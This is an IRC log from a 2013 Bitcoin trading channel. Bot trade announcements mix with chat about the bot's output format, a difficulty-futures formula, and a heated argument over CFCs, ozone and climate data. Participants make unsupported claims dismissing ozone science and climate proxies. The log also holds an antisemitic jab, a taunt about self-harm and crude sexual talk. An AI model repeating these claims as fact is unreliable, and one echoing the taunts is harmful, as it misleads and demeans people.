lighbulbs currently, god forbid poor africans end up with homebrew industry and do the whole azn thing. Sep 17 17:13:16 [BTCTC] [S] [CRYPTO-TRADE] 37 @ 0.19976486 = 7.3913 BTC [+] {4} Sep 17 17:13:31 Interesting, where's that from? Sep 17 17:13:59 the text off http://esr.ibiblio.org/?p=3974&cpage=1#comment-343643 Sep 17 17:14:11 its contents broadly matches my own memory of the entire debacle. Sep 17 17:14:41 http://www.epa.gov/ozone/science/myths/volcano.html Sep 17 17:14:44 Myth: Volcanoes and the Oceans are Causing Ozone Depletion | Science | Ozone Layer Protection | US E Sep 17 17:14:47 The relationship between volcanic eruptions and ozone depletion is one of the most misunderstood in the realm of ozone science. Scientists seriously considered the impacts these awesome natural events might have on the ozone layer. They concluded, however, that ODS like CFCs are the real source of stratospheric chlorine, and thus ozone depletion. Sep 17 17:14:57 confirmational bias is a helluva drug Sep 17 17:15:18 [BTCTC] [S] [CRYPTO-TRADE] 453 @ 0.2 = 90.6 BTC [+] {2} Sep 17 17:15:57 lewicki i don't consider the epa an authority in any field. Sep 17 17:16:17 dub indeed. Sep 17 17:16:18 [HAVELOCK] [B] [XBOND] 8000 @ 0.0012195 = 9.756 BTC [+] {10} Sep 17 17:16:22 I consider it more than you Sep 17 17:16:26 sources? Sep 17 17:16:28 that's fine. Sep 17 17:17:03 lewicki well let's start with something basic. what's the atomic mass of a cpc molecule ? (any one, at your choice) Sep 17 17:17:09 this is why its a silly discussion, we're applying the cargo cult thing to each other, its like religion Sep 17 17:17:10 cfc even Sep 17 17:17:34 no dub, the situation is not equivalent. Sep 17 17:18:05 you construct appeals to authority and attempts at social proof. i shrug and point at numbers. Sep 17 17:18:23 except you havent Sep 17 17:18:29 No, I am not working through molecular sciences with you. Someone has to have published your viewpoint. cite your source Sep 17 17:18:30 you've pointed at ESR Sep 17 17:18:36 who is an idiot Sep 17 17:19:07 lewicki if you're not working with molecular sciences with me you can go read whatever you wish wherever you wish to read it. Sep 17 17:19:12 im not a wikipedian. i am a human being. Sep 17 17:19:26 dub recall the 50 / 150 year problem ? TomServo picked up on it. you failed to do so. Sep 17 17:19:43 no i didnt Sep 17 17:20:01 I discounted it as irrelevant Sep 17 17:20:06 right. Sep 17 17:20:16 hence the situation is not equivalent. Sep 17 17:20:52 you're saying god exists because mary got preggers sans cock Sep 17 17:21:48 I don't get it Sep 17 17:22:03 i bet you btct is run by a jew Sep 17 17:22:08 nope. that'd be the strawmaning part of the entire thing i glossed over, but i guess you can add it to appeal to authority and social proofing. Sep 17 17:22:12 The sheeple are paying over the odds for XRP again. Sep 17 17:22:24 [HAVELOCK] [S] [LABCO] 4 @ 0.00249 = 0.01 BTC [-] Sep 17 17:23:01 go ripples Sep 17 17:25:00 maybe they could make a ripple based carbon thingee. Sep 17 17:25:19 so people all over the world could trade their and their friends' carbon with each other. Sep 17 17:25:27 [BTCTC] [S] [ESECURITYSABTC] 1 @ 0.2698 BTC [+] Sep 17 17:25:32 maybe zynga could implement it. Sep 17 17:30:34 dub: Temperature data is irrelevant..how? Sep 17 17:32:14 And what's the point of excusing yourself from the conversation.. only to randomly interject? Sep 17 17:32:38 150 years is a nanosecond in teh context Sep 17 17:32:55 its a meaningless scale Sep 17 17:33:01 since i'm reading up on this : "In 1928 they improved the synthesis of CFCs and demonstrated their usefulness for such a purpose and their stability and nontoxicity. Kettering patented a refrigerating apparatus to use the gas" Sep 17 17:33:14 but it's an important part of the global warming theory Sep 17 17:33:17 guess what ?! CFC became very bad a thing just as patent on them was expiring. Sep 17 17:33:23 it is? Sep 17 17:33:30 though it was somewhat toned down after real scientists looked after it Sep 17 17:33:35 [BTCTC] [S] [LABCOIN] 2500 @ 0.00285281 = 7.132 BTC [+] {10} Sep 17 17:34:02 don't we have 10's of millenia worth of data to look at? Sep 17 17:34:34 sure - but how would that support AGW? Sep 17 17:34:36 [BTCTC] [S] [LABCOIN] 600 @ 0.00283 = 1.698 BTC [-] Sep 17 17:35:04 what "we" and what 10s of millenia data is that ?! Sep 17 17:35:37 [MPEX] [S] [S.MPOE] 7800 @ 0.00091663 = 7.1497 BTC [-] {2} Sep 17 17:35:56 Although I don't disagree, saying nanoseconds don't matter is a little obtuse. If 10,000 nuclear bombs went off all at once there would be problems. Sep 17 17:35:57 heh Sep 17 17:36:18 what? science? Sep 17 17:37:34 lewicki: I thought they are pointing to a warmer than average day 150 years ago as being proof postiive oslt Sep 17 17:38:10 lewicki it's a sampling problem. the same problem you eschewed earlier, as i was about to ask you if you know enough math to model the average concentration of gas A in the top tenth of a recipient holding a mixture of A and B where A is 10x as heavy as B. Sep 17 17:38:40 [BTCTC] [S] [TAT.ASICMINER] 1 @ 0.01929 BTC [+] Sep 17 17:39:07 wehen you say things like "if x bombs go off at the samer time" you're displaying exactly the misunderstanding of sampling in question : nobody guarantgees you that second is going to be exactly the second when the bombs go off. Sep 17 17:39:24 which is exactly the problem with "washing" data, such as trying to extract temperature records from soil samples. Sep 17 17:42:44 [MPEX] [S] [S.MPOE] 11300 @ 0.00091987 = 10.3945 BTC [+] {2} Sep 17 17:42:57 wait wat Sep 17 17:43:45 [BTCTC] [S] [BASIC-MINING] 24 @ 0.11 = 2.64 BTC [+] Sep 17 17:45:40 There seemed to be potential for interesting discussion, but evidently being snarky is way cooler. Sep 17 17:45:48 [BTCTC] [S] [LABCOIN] 30 @ 0.00287396 = 0.0862 BTC [+] {13} Sep 17 17:46:24 no Sep 17 17:46:37 its not interesting, it was interesting 20 years ago Sep 17 17:46:48 [BTCTC] [S] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Sep 17 17:46:55 i suspect it's just "thinking is hard and why bother" rather than "snarky is cool". Sep 17 17:47:47 a lot of the arguments used 20 years ago were debunked and are no longer used, so… Sep 17 17:47:54 its like marveling at how we click a mouse and porn appears, 20 years ago this was novel Sep 17 17:48:22 im not even sure whence this delusion of majority on the bunko science camp stems from. Sep 17 17:48:31 it reminds me a lot of that character with the bitfury bet. Sep 17 17:53:56 [BTCTC] [S] [LABCOIN] 1 @ 0.002888 BTC [+] Sep 17 17:56:59 [MPEX] [S] [S.MPOE] 17036 @ 0.00091602 = 15.6053 BTC [-] {3} Sep 17 17:57:01 similarly, the claim of debunkation and actual debunkment Sep 17 17:57:31 don't seem to see such claim made. Sep 17 17:58:23 michael moore branded science notwithstanding Sep 17 17:58:59 it's so easy to debunk things and poke holes around Sep 17 17:59:01 [HAVELOCK] [S] [AM100] 1 @ 0.0194 BTC [-] Sep 17 17:59:02 [BTCTC] [S] [DMS.MINING] 11 @ 0.0024009 = 0.0264 BTC [-] {2} Sep 17 17:59:10 but building a better model... Sep 17 17:59:52 nothing wrong with finding the holes, really. Sep 17 18:00:39 .bait Sep 17 18:00:43 http://31.media.tumblr.com/e545761b634ca3df5619ed3373979513/tumblr_mouimqziLM1r3yc8oo1_1280.jpg Sep 17 18:00:54 I win. Sep 17 18:01:05 not bad Sep 17 18:01:12 is that teak? Sep 17 18:01:13 whoop that's nsfw Sep 17 18:01:29 i have teak in my bathroom too Sep 17 18:01:39 is not bad Sep 17 18:02:46 kakobrekla, it could be plywood at that point, I wouldn't care. Sep 17 18:02:58 she;d care. Sep 17 18:03:15 no she wouldn't. Sep 17 18:03:32 you ever fucked a chick on plywood ? Sep 17 18:04:01 No, I have teak. Sep 17 18:04:05 have you ever parked your bicycle in an airplane hangar? Sep 17 18:04:06 [BTCTC] [S] [LABCOIN] 4 @ 0.0028835 = 0.0115 BTC [-] {2} Sep 17 18:04:23 So what is the deal with the new {x} ? Sep 17 18:04:36 i haven;t, no. Sep 17 18:04:40 lotto numbers Rulother Sep 17 18:05:00 number of trades? Sep 17 18:05:03 aggregate reporting? Sep 17 18:05:07 [BTCTC] [S] [DMS.MINING] 50 @ 0.002494 = 0.1247 BTC [+] {2} Sep 17 18:05:08 nobody belives me wtf Sep 17 18:05:33 kakobrekla: you say it like you're surprised. Sep 17 18:05:41 the format is a little wtf Sep 17 18:05:42 hah Sep 17 18:06:01 dub, what else you gonna bitch about? Sep 17 18:06:18 do it liek Sep17 15:03:21 mtgox x5 11.6410 @ 139.39974143 USD Sep 17 18:06:29 http://www.imdb.com/title/tt0205000/quotes Sep 17 18:06:34 Deuce Bigalow: Male Gigolo (1999) - Quotes - IMDb Sep 17 18:07:00 imsaguy: I could bitch about your mom Sep 17 18:07:13 Yeah, death can be inconvenient Sep 17 18:07:25 but it looks like it hasn't stopped you Sep 17 18:07:40 it didnt stop her Sep 17 18:07:48 boom Sep 17 18:10:14 Today lucky lotto draw numbers are : 2 2 13 10 2 1 3 2 Sep 17 18:10:21 fuck told ya. Sep 17 18:10:26 fuckin Sep 17 18:11:10 dub the trades merged are of various ammts, i cant do that Sep 17 18:11:27 the price reported is weighted price Sep 17 18:11:39 sum, is well, sum of shares or whatever Sep 17 18:11:56 mircea_popescu: so thinking out loud, if measuring at the surface is unreliable does the specific gravity of co2 vary? or how do we account for variation in the samples Sep 17 18:12:19 that'll need context Sep 17 18:12:49 mircea_popescu stop being a moomoo Sep 17 18:12:54 what's new on trilema? Sep 17 18:13:15 you made a comment about measuring somethign 10x heavier than something else Sep 17 18:13:22 was that not the gist? Sep 17 18:13:27 that was in relation to a cfc/ozone layer discussion. Sep 17 18:13:49 anyway im open to different syntaxing Sep 17 18:14:09 if its sensful ill change it Sep 17 18:14:20 now im off for a while, bbl Sep 17 18:14:22 I'd like buy/sell Sep 17 18:14:25 and colors!! Sep 17 18:14:27 kakobrekla, the x5 is essentially your {5} Sep 17 18:14:30 fuck you pankkake Sep 17 18:14:35 :( Sep 17 18:14:36 those are weighted from amphi as well Sep 17 18:14:42 hm? Sep 17 18:14:51 dub the trades merged are of various ammts, i cant do that Sep 17 18:14:53 you can Sep 17 18:15:05 x5 11.6410 @ 139.39974143 USD Sep 17 18:15:06 Sep17 15:03:21 mtgox x5 11.6410 @ 139.39974143 USD << that's weighted Sep 17 18:15:11 yeah, its weighted Sep 17 18:15:12 this is not 5 equally sized trades? Sep 17 18:15:15 nope Sep 17 18:15:19 oh. Sep 17 18:15:23 its everything that happened in that second Sep 17 18:15:30 yea im just saying move the number Sep 17 18:15:49 doable but it brings up the question Sep 17 18:15:52 am i retarded? Sep 17 18:16:00 kakobrekla: truthful answer? Sep 17 18:16:13 meh, i kinda knew it already Sep 17 18:16:18 I was gonna say no Sep 17 18:16:28 you trickster you. Sep 17 18:16:54 I didn't know if you were going to go all teenageangst or not Sep 17 18:17:06 I dont wanna be all sarcastic and be the reason you slash your wrists again Sep 17 18:17:40 i had to ud teenageangst. Sep 17 18:17:42 mircea_popescu: so whats the problem with the soil or watever samples? Sep 17 18:17:50 there should be a space in there Sep 17 18:18:36 you weren't there when they were made. they Sep 17 18:18:46 re not measurements, not per se. Sep 17 18:19:01 this is where the millenia of imperial evidence the sciencey types agree on Sep 17 18:19:10 imperical Sep 17 18:19:25 lulz Sep 17 18:19:40 empirical ? Sep 17 18:19:41 what? Sep 17 18:19:47 yea that Sep 17 18:19:56 the factual stuff Sep 17 18:20:01 annoying as it is Sep 17 18:20:08 its not factual dawg. Sep 17 18:20:20 a measurement is when you measure it. not when you guess what it might have been by some circumstantial evidence. Sep 17 18:20:23 different beasts. Sep 17 18:20:36 in that case god must exist Sep 17 18:20:44 how did you reason ? Sep 17 18:20:46 I am saved. Sep 17 18:21:48 clearly everything and nothing is true Sep 17 18:22:07 i don't get why this sort of broken thought process is so attractive to you. Sep 17 18:22:15 [HAVELOCK] [S] [AM100] 1 @ 0.0187 BTC [-] Sep 17 18:22:17 i moved the count now, hope it doesnt end up more confusing Sep 17 18:22:27 just because some particular thing you were invested into fails to pass muster does not mean the entire world has been obliterated. simmar down. Sep 17 18:22:36 youre the one throwing out the body of scientific knowledge Sep 17 18:22:41 nope. Sep 17 18:22:54 anyway, got some stuff to dom, we continue later. Sep 17 18:23:08 someone do some trades so we see it go Sep 17 18:23:52 stuff to dom, thats not a nice way to refer to your subs Sep 17 18:24:17 [BTCTC] [S] [LABCOIN] 1 @ 0.002888 BTC [+] Sep 17 18:24:18 http://www.youtube.com/watch?v=qUmHKHbQe80 Sep 17 18:24:20 Fuck off I got work to do. - YouTube Sep 17 18:24:21 mp was like dat Sep 17 18:25:18 [HAVELOCK] [S] [DEALCO] 5 @ 0.00999999 = 0.05 BTC [+] Sep 17 18:27:09 this sums up the recent dialogue in here nicely http://www.youtube.com/watch?v=US6pWjvJJSE Sep 17 18:27:52 :D Sep 17 18:28:30 gotta love bubbles Sep 17 18:29:03 ;;google Isley Bros I got Work to do Sep 17 18:29:04 WORK TO DO - Isley Brothers - YouTube: ; The Isley Brothers "Work To Do (Live Ver.)" - YouTube: ; Work To Do Lyrics - Isley Brothers: Sep 17 18:29:29 kakobrekla: http://www.youtube.com/watch?v=xEEGU5U7Mac - should be your working song for now on Sep 17 18:29:40 lets hear it Sep 17 18:30:23 [HAVELOCK] [B] [XBOND] 5000 @ 0.001199 = 5.995 BTC [-] Sep 17 18:30:23 not enough fuck fuck shit fuck in the song Sep 17 18:32:25 [BTCTC] [S] [BTC-TRADING-PT] 9x 31 @ 0.98256771 = 30.4596 BTC [-] Sep 17 18:32:37 dis what you want dub? Sep 17 18:33:26 [HAVELOCK] [B] [XBOND] 216 @ 0.001195 = 0.2581 BTC [-] Sep 17 18:33:33 i hear no bitching so must be good enough. Sep 17 18:34:27 [BTCTC] [S] [LABCOIN] 12x 1268 @ 0.00296878 = 3.7644 BTC [+] Sep 17 18:34:46 cant you put the x in front? Sep 17 18:35:05 derpherp Sep 17 18:36:29 [BTCTC] [S] [ACTIVEMINING] 7x 700 @ 0.00269 = 1.883 BTC [+] Sep 17 18:36:29 [BTCTC] [S] [LABCOIN] 5x 3417 @ 0.00299757 = 10.2427 BTC [+] Sep 17 18:38:21 changing what assbot says Sep 17 18:38:41 [BTCTC] [S] [LABCOIN] x2 701 @ 0.00299381 = 2.0987 BTC [-] Sep 17 18:38:51 kakobrekla: almost perfect Sep 17 18:38:54 that looks horrible Sep 17 18:39:02 just need to implement a reliable internet sarcasm parser Sep 17 18:39:42 [BTCTC] [S] [ACTIVEMINING] 1 @ 0.002587 BTC [-] Sep 17 18:39:43 [BTCTC] [S] [LABCOIN] 100 @ 0.003 = 0.3 BTC [+] Sep 17 18:39:47 terrible is what it is. Sep 17 18:40:43 [BTCTC] [S] [B.YABMC] 30 @ 0.000705 = 0.0212 BTC [-] Sep 17 18:40:44 [BTCTC] [S] [TAT.ASICMINER] 33 @ 0.01929 = 0.6366 BTC [+] Sep 17 18:40:45 and if you dont get that reference you should be watchin dead man Sep 17 18:41:02 I don't get the need for the first bit Sep 17 18:41:22 you should be, anyway Sep 17 18:41:45 [BTCTC] [S] [B.YABMC] 4 @ 0.0007 = 0.0028 BTC [-] Sep 17 18:41:45 [HAVELOCK] [S] [VTX] 2 @ 0.595 = 1.19 BTC [+] Sep 17 18:41:46 [BTCTC] [S] [KENILWORTH] 1 @ 0.001748 BTC [+] Sep 17 18:42:04 probably Sep 17 18:42:28 anyway, nearly sunrise, should go home from work Sep 17 18:42:35 dub dub Sep 17 18:42:39 listen to some wub wub Sep 17 18:42:46 [BTCTC] [FN] [DMS.SELLING] x3 283 @ 0.0070491 = 1.9949 BTC [+] Sep 17 18:42:46 [BTCTC] [S] [KENILWORTH] 9 @ 0.001748 = 0.0157 BTC [+] Sep 17 18:43:08 so what is x3 283 Sep 17 18:43:18 implying Sep 17 18:43:25 >implying Sep 17 18:43:33 peace out bitches Sep 17 18:43:47 [BTCTC] [S] [LABCOIN] x9 3000 @ 0.00286232 = 8.587 BTC [-] Sep 17 18:44:00 x9 3000? Sep 17 18:44:48 [MPEX] [S] [S.MPOE] x3 9564 @ 0.00091547 = 8.7556 BTC [-] Sep 17 18:44:48 [BTCTC] [S] [TAT.MINIGAME] 1 @ 0.000249 BTC [+] Sep 17 18:46:50 [HAVELOCK] [S] [LABCO] 25 @ 0.00248 = 0.062 BTC [-] Sep 17 18:47:50 [BTCTC] [S] [BFMINES] 1 @ 0.001743 BTC [-] Sep 17 18:47:50 [BTCTC] [S] [ASICMINER-PT] x4 9 @ 2.07411111 = 18.667 BTC [-] Sep 17 18:47:50 [BTCTC] [S] [BITVPS] 1 @ 0.001802 BTC [-] Sep 17 18:48:51 [HAVELOCK] [S] [LABCO] x2 242 @ 0.00249669 = 0.6042 BTC [+] Sep 17 18:48:52 [BTCTC] [S] [KENILWORTH] 1 @ 0.001649 BTC [-] Sep 17 18:49:17 not a fan of the x4 Sep 17 18:49:29 was better on the tail end Sep 17 18:49:44 i agree Sep 17 18:49:52 [BTCTC] [S] [LABCOIN] 3 @ 0.002864 = 0.0086 BTC [+] Sep 17 18:50:53 [MPEX] [S] [S.MPOE] x3 9053 @ 0.00091355 = 8.2704 BTC [-] Sep 17 18:50:53 [BTCTC] [S] [NASTY-PT] 1 @ 0.0014 BTC [-] Sep 17 18:50:53 [HAVELOCK] [B] [XBOND] 4 @ 0.00122 = 0.0049 BTC [+] Sep 17 18:51:10 yes Sep 17 18:51:28 anyone see this: https://bitcointalk.org/index.php?topic=295187 Sep 17 18:51:54 [BTCTC] [S] [PAJKA.BOND] 3 @ 0.018 = 0.054 BTC [+] Sep 17 18:51:56 i love the x3 and x9 lololol Sep 17 18:52:13 !ticker HAVELOCK XBOND Sep 17 18:52:16 [HAVELOCK:XBOND] 1D: 0.00116600 / 0.00120151 / 0.00123999 (36756 shares, 44.16285938 BTC), 7D: 0.00110000 / 0.00118425 / 0.00124049 (134082 shares, 158.78624045 BTC), 30D: 0.00100000 / 0.00112963 / 0.00142350 (431028 shares, 486.90056773 BTC) Sep 17 18:52:56 [BTCTC] [S] [RSM] 1 @ 0.006735 BTC [-] Sep 17 18:54:35 [BTCTC] [S] [S.MPOE-PT] 1 @ 0.00085 BTC [-] Sep 17 18:56:37 [MPEX] [S] [S.MPOE] 10500 @ 0.00091599 = 9.6179 BTC [+] Sep 17 18:56:37 [BTCTC] [S] [ACTIVEMINING] 2050 @ 0.00258264 = 5.2944 BTC [-] {6} Sep 17 18:58:39 [BTCTC] [S] [DMS.MINING] 6 @ 0.002494 = 0.015 BTC [+] Sep 17 18:58:39 [BTCTC] [S] [TAT.MINIGAME] 20 @ 0.000221 = 0.0044 BTC [-] Sep 17 18:58:39 [BTCTC] [S] [LABCOIN] 1740 @ 0.00299384 = 5.2093 BTC [+] {8} Sep 17 18:59:09 {n} = split into n orders? Sep 17 18:59:40 [BTCTC] [S] [TAT.VIRTUALMINE] 1 @ 0.00061 BTC [-] Sep 17 19:00:04 Trying to figure this out myself too Sep 17 19:01:26 seems obvious, no? Sep 17 19:01:27 8 orders totalling 1740 for an avg of 0.00299384 Sep 17 19:01:39 what else could it even be? Sep 17 19:01:52 8 unicorns obv Sep 17 19:02:42 in other news, commuting at this time of day rocks Sep 17 19:02:43 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.045 BTC [-] Sep 17 19:02:43 [BTCTC] [S] [DMS.MINING] 251 @ 0.0023752 = 0.5962 BTC [-] {2} Sep 17 19:03:44 [BTCTC] [FN] [DMS.SELLING] 11 @ 0.007095 = 0.078 BTC [+] Sep 17 19:04:45 [BTCTC] [FN] [DMS.SELLING] 100 @ 0.007096 = 0.7096 BTC [+] Sep 17 19:04:45 [BTCTC] [S] [ET.DIFF.FUTURE] 54 @ 0.0204 = 1.1016 BTC {5} Sep 17 19:06:46 hm Sep 17 19:06:59 the avg price is not enough i'd say Sep 17 19:07:03 include the final price Sep 17 19:07:48 [BTCTC] [S] [KENILWORTH] 1 @ 0.001649 BTC [-] Sep 17 19:08:50 [BTCTC] [FN] [DMS.SELLING] 175 @ 0.007098 = 1.2422 BTC [+] {2} Sep 17 19:08:50 [BTCTC] [S] [ET.DIFF.FUTURE] 1 @ 0.0204 BTC Sep 17 19:09:51 [BTCTC] [S] [KENILWORTH] 7 @ 0.00164814 = 0.0115 BTC [-] {2} Sep 17 19:09:51 [BTCTC] [S] [ET.DIFF.SHORT] 1 @ 0.00204 BTC Sep 17 19:09:51 [BTCTC] [S] [TAT.MINIGAME] 926 @ 0.000221 = 0.2046 BTC [-] Sep 17 19:09:51 [BTCTC] [FN] [DMS.PURCHASE] 1 @ 0.009339 BTC [-] Sep 17 19:10:10 [BTCTC] [FN] [DMS.SELLING] 175 @ 0.007098 = 1.2422 BTC [+] {2} 8===D (.)(.) >< $1337 Sep 17 19:10:23 do it liek dat Sep 17 19:10:52 [BTCTC] [S] [ET.DIFF.FUTURE] 27 @ 0.0204 = 0.5508 BTC {2} Sep 17 19:11:03 scam! Sep 17 19:11:18 https://bitcointalk.org/index.php?topic=288765.msg3174010#msg3174010 << can anyone confirm? Sep 17 19:11:24 [BTC-TC] ET.DIFF: Future to speculate on next difficulty change Sep 17 19:11:53 [BTCTC] [S] [ET.DIFF.FUTURE] 4 @ 0.0204 = 0.0816 BTC Sep 17 19:11:53 [BTCTC] [FN] [DMS.SELLING] 29 @ 0.007097 = 0.2058 BTC [-] Sep 17 19:11:56 An updated, more detailed prospectus for NEOBEE is now available: http://lmb-holdings.com/LMB_Holdings_Prospectus.pdf[/url] Sep 17 19:11:56 NOTE: The Pre-IPVO round for XBOND holders begins at the top of the hour! Sep 17 19:12:54 [BTCTC] [S] [LABCOIN] 4417 @ 0.00299746 = 13.2398 BTC [+] {10} Sep 17 19:12:54 [BTCTC] [FN] [DMS.PURCHASE] 29 @ 0.009339 = 0.2708 BTC [-] Sep 17 19:13:55 [BTCTC] [S] [ET.DIFF.SHORT] 25 @ 0.00204 = 0.051 BTC {2} Sep 17 19:13:55 [BTCTC] [S] [ASICMINER-PT] 1 @ 2.075 BTC [+] Sep 17 19:13:55 [BTCTC] [S] [ET.DIFF.FUTURE] 1000 @ 0.0204 = 20.4 BTC Sep 17 19:15:57 [BTCTC] [FN] [DMS.SELLING] 1 @ 0.007097 BTC [-] Sep 17 19:15:57 [BTCTC] [S] [DMS.MINING] 1 @ 0.002494 BTC [+] Sep 17 19:16:57 [BTCTC] [FN] [DMS.PURCHASE] 1 @ 0.009339 BTC [-] Sep 17 19:16:57 [BTCTC] [S] [ET.DIFF.LONG] 4 @ 0.002045 = 0.0082 BTC Sep 17 19:18:59 [BTCTC] [S] [DMS.MINING] 30 @ 0.00235552 = 0.0707 BTC [-] {3} Sep 17 19:20:00 [BTCTC] [S] [TAT.VIRTUALMINE] 5 @ 0.0006319 = 0.0032 BTC [+] Sep 17 19:20:01 [BTCTC] [S] [LABCOIN] 1 @ 0.002968 BTC [-] Sep 17 19:21:01 [BTCTC] [S] [LABCOIN] 3 @ 0.002929 = 0.0088 BTC [-] Sep 17 19:23:03 [BTCTC] [FN] [DMS.SELLING] 1 @ 0.00709 BTC [-] Sep 17 19:24:04 [BTCTC] [S] [DMS.MINING] 1 @ 0.002493 BTC [+] Sep 17 19:25:05 [BTCTC] [S] [TAT.ASICMINER] 10 @ 0.01924 = 0.1924 BTC [-] Sep 17 19:27:59 https://bitcointalk.org/index.php?topic=229036.msg3174029#msg3174029 Sep 17 19:28:05 [BTC-TC] BMF -- News Flash: LTC-ATF buys controlling stake in BMF Sep 17 19:29:10 [BTCTC] [S] [LABCOIN] 596 @ 0.00284914 = 1.6981 BTC [-] {6} Sep 17 19:30:14 LOL Sep 17 19:30:19 trolling for sure Sep 17 19:32:13 [MPEX] [S] [S.MPOE] 4815 @ 0.00092 = 4.4298 BTC [+] {2} Sep 17 19:32:13 [BTCTC] [S] [DMS.MINING] 1 @ 0.002493 BTC [+] Sep 17 19:36:17 [HAVELOCK] [B] [XBOND] 400 @ 0.00122 = 0.488 BTC [+] Sep 17 19:42:23 [HAVELOCK] [B] [XBOND] 60 @ 0.00122 = 0.0732 BTC [+] Sep 17 19:43:24 [HAVELOCK] [S] [AM100] 128 @ 0.01944327 = 2.4887 BTC [+] {2} Sep 17 19:44:25 [BTCTC] [S] [LABCOIN] 503 @ 0.00284627 = 1.4317 BTC [-] {4} Sep 17 19:44:25 [HAVELOCK] [S] [LABCO] 60 @ 0.0025 = 0.15 BTC [+] Sep 17 19:44:55 the fuck usagi Sep 17 19:45:07 ThickAsThieves what's trolling about it Sep 17 19:45:08 the article? Sep 17 19:45:26 [BTCTC] [S] [LABCOIN] 5564 @ 0.00294402 = 16.3805 BTC [+] {11} Sep 17 19:46:27 Usagi is fucking with Deprived obv Sep 17 19:46:27 [BTCTC] [S] [LABCOIN] 340 @ 0.00299882 = 1.0196 BTC [+] {2} Sep 17 19:46:37 http://blogs.barrons.com/focusonfunds/2013/09/17/vanlue-investing-congress-winklevoss-brothers-talk-bitcoin/ Sep 17 19:46:41 Value Investing Congress: Winklevoss Brothers Call Bitcoin ‘The Internet of Money,’ Currency†Sep 17 19:47:28 [BTCTC] [S] [TAT.ASICMINER] 220 @ 0.01929831 = 4.2456 BTC [+] {2} Sep 17 19:48:28 [BTCTC] [S] [BITVPS] 44 @ 0.001989 = 0.0875 BTC [+] Sep 17 19:48:28 [BTCTC] [S] [TAT.ASICMINER] 70 @ 0.0193 = 1.351 BTC [+] Sep 17 19:48:29 [BTCTC] [S] [LABCOIN] 800 @ 0.00299673 = 2.3974 BTC [-] {2} Sep 17 19:48:48 what's the value in the {}? Sep 17 19:49:06 the future price Sep 17 19:49:15 2 bitcoin in the next hour :p Sep 17 19:49:34 ^ Sep 17 19:49:50 omg the winklevii Sep 17 19:50:26 I'm so sick of the winklevii Sep 17 19:51:19 the winklevii say USD can be replaced by bitcoin Sep 17 19:51:30 they are like totally smart and stuff Sep 17 19:51:42 rofl the winklevii Sep 17 19:51:49 oh wait not USD Sep 17 19:51:51 i like that word Sep 17 19:52:11 but a country Sep 17 19:53:33 [BTCTC] [S] [LTC-ATF.B2] 12 @ 0.0109 = 0.1308 BTC [+] Sep 17 19:56:36 [BTCTC] [S] [LABCOIN] 1900 @ 0.002942 = 5.5898 BTC [-] Sep 17 19:59:40 [HAVELOCK] [B] [XBOND] 1200 @ 0.00122 = 1.464 BTC [+] Sep 17 20:01:30 dexX7 why aren;t they straight lines ? Sep 17 20:02:14 wait, deprieved buys into usagi ?! Sep 17 20:03:05 Urushiol number of lines that were averaged together. Sep 17 20:03:33 hm what? Sep 17 20:03:44 [BTCTC] [S] [DMS.MINING] 6 @ 0.002493 = 0.015 BTC [+] Sep 17 20:03:45 thanks mircea_popescu Sep 17 20:04:04 the number {n} is the amount of orders within this "block" Sep 17 20:04:12 and the price is averaged Sep 17 20:04:15 dexX7 you linked to some graph Sep 17 20:04:24 i see Sep 17 20:04:31 the formula is.. 1 sec Sep 17 20:04:45 [BTCTC] [S] [LABCOIN] 266 @ 0.00290021 = 0.7715 BTC [-] {4} Sep 17 20:04:45 [BTCTC] [FN] [DMS.PURCHASE] 240 @ 0.009339 = 2.2414 BTC [-] Sep 17 20:05:04 (((current difficulty - next difficulty) / next difficulty) / 100) * 4 Sep 17 20:05:57 seems liniar to me. Sep 17 20:06:47 [BTCTC] [S] [LABCOIN] 501 @ 0.0028461 = 1.4259 BTC [-] {2} Sep 17 20:06:54 long = -formula, short = 0,02 - long Sep 17 20:06:57 that's what i used Sep 17 20:07:48 [BTCTC] [S] [ACTIVEMINING] 350 @ 0.002734 = 0.9569 BTC [+] Sep 17 20:08:29 so, should I sell all my LTC-ATF? Sep 17 20:08:49 [BTCTC] [S] [DMS.MINING] 10 @ 0.002493 = 0.0249 BTC [+] Sep 17 20:08:49 [BTCTC] [S] [LABCOIN] 1025 @ 0.0028371 = 2.908 BTC [-] {3} Sep 17 20:09:06 pankkake maybe ask deprived wtf. Sep 17 20:09:12 http://www.wolframalpha.com/input/?i=%28%28%28112628548-x%29%2Fx%29%2F100%29*4 Sep 17 20:09:16 (((112628548-x)/x)/100)*4 - Wolfram|Alpha Sep 17 20:11:44 ah i mixed current and last Sep 17 20:11:50 oh i see Sep 17 20:11:59 makes sense now. Sep 17 20:12:53 [BTCTC] [S] [TAT.VIRTUALMINE] 5 @ 0.0006319 = 0.0032 BTC [+] Sep 17 20:13:54 [BTCTC] [S] [LABCOIN] 2166 @ 0.00281219 = 6.0912 BTC [-] {7} Sep 17 20:14:05 !ticker b00bies Sep 17 20:14:06 The eagle never lost so much time as when he submitted to learn from the crow. Sep 17 20:14:25 http://www.wolframalpha.com/input/?i=%28%28%28x+-+112628548%29+%2F+112628548%29+%2F+100%29+*+4 that's the correct one Sep 17 20:14:26 !tickle b00bies Sep 17 20:14:29 (((x - 112628548) / 112628548) / 100) * 4 - Wolfram|Alpha Sep 17 20:15:23 wait. Sep 17 20:15:53 you mixed the diffs in the wolfram alpha ? i thought you meant in yoru original formula, and the prev wa formula is it. Sep 17 20:15:55 I want to tickle Sep 17 20:16:12 well. i was confussed with "current" and "last diff" Sep 17 20:16:19 and thought of current = last Sep 17 20:16:36 .d Sep 17 20:16:37 112628548.66635 | Next Diff in 1539 blocks | Estimated Change: 21.3921% in 8d 9h 32m 38s Sep 17 20:16:45 ;;nethash Sep 17 20:16:45 991790.285579 Sep 17 20:17:00 are we about to hit 1 tera? Sep 17 20:17:01 so basically we're back to "why isn't your forum graph linear" Sep 17 20:17:34 long=(((current - last) / last) / 100) * 4, short = 0,02 - long Sep 17 20:17:44 http://i.imgur.com/L1pmRJz.png Sep 17 20:17:47 seems accurate now Sep 17 20:18:08 aha Sep 17 20:18:59 [BTCTC] [S] [BTC-TRADING-PT] 3 @ 0.963 = 2.889 BTC [-] Sep 17 20:22:02 [BTCTC] [S] [LABCOIN] 304 @ 0.00280166 = 0.8517 BTC [-] {4} Sep 17 20:22:02 [HAVELOCK] [B] [XBOND] 5 @ 0.0012 = 0.006 BTC [-] Sep 17 20:22:03 [BTCTC] [S] [BTC-TRADING-PT] 3 @ 0.963 = 2.889 